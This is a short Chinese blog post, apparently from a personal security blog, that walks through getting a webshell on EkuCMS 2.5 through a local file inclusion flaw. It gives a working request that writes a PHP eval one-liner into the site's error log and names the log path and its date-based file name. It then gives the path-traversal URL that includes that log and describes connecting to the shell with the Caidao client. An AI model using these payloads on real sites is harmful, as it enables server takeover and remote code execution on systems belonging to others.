当前位置:网站首页 > 网络安全 > 正文

易酷CMS本地包含漏洞拿Shell

花落花落 2017-12-31 697 0

测试版本:易酷cms2.5

包含一句话:http://localhost/ekucms2.5/?s=my/show/id/{~eval($_POST[x])}

易酷CMS本地包含漏洞拿Shell 网络安全 第1张

会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日


易酷CMS本地包含漏洞拿Shell 网络安全 第2张



错误日志内容为


易酷CMS本地包含漏洞拿Shell 网络安全 第3张

包含错误日志地址:http://localhost/?s=my/show/id/\..\temp\logs\17_12_23.log

易酷CMS本地包含漏洞拿Shell 网络安全 第4张



使用菜刀链接

易酷CMS本地包含漏洞拿Shell 网络安全 第5张

连接成功

易酷CMS本地包含漏洞拿Shell 网络安全 第6张

转载请注明来自花落博客,本文标题:《易酷CMS本地包含漏洞拿Shell》

标签:漏洞shell易酷本地

本文暂时没有评论,来添加一个吧(●'◡'●)

欢迎 发表评论:

关于我

欢迎关注微信公众号